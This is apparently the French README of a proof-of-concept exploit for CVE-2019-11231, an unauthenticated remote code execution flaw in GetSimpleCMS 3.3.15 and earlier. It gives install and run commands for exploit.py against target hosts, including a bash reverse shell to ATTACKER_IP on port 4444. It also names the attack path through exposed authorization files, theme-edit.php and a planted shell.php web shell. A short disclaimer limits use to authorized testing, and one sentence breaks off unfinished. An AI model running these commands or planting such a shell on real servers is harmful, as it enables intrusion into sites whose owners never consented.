
PoC CVE-2019-11231
Exploit d'exécution de code à distance non authentifié pour GetSimpleCMS ≤ 3.3.15
GetSimpleCMS expose publiquement des fichiers sensibles (/data/other/authorization.xml, /data/users/) permettant aux attaquants de :
Score CVSS : 9.8 (Critique)
pip install -r requirements.txt
python3 exploit.py http://target.com "id"
python3 exploit.py gettingstarted.htb "whoami"
python3 /tmp/test.py gettingstarted.htb "/bin/bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1'"
/admin//data/other/authorization.xml/data/users//admin/theme-edit.php/admin/theme-edit.php/theme/shell.php?cmd=...exploit.py - Script d'exploit principalrequirements.txt - Dépendances (requests, beautifulsoup4)⚠️ À des fins éducatives uniquement. Testez uniquement sur des systèmes que vous possédez ou pour lesquels vous avez l'autorisation de tester.